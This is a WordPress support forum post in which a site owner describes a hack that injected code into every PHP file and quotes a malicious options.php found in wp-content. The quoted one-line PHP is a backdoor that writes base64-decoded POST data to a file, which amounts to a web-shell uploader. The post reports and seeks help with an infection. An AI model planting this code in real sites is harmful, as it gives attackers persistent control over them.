Infected File
-
I had one of my sites hacked recently when malicous code was injected in every php file on the install.
Eventually I found the culprit to be an options.php file I found lurking in the wp-content folder.
File had the following code:
<?phpif (isset($_POST['da'])) {file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);}?>Has anyone else come across this file?
Any ideas where it came from?
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
The topic ‘Infected File’ is closed to new replies.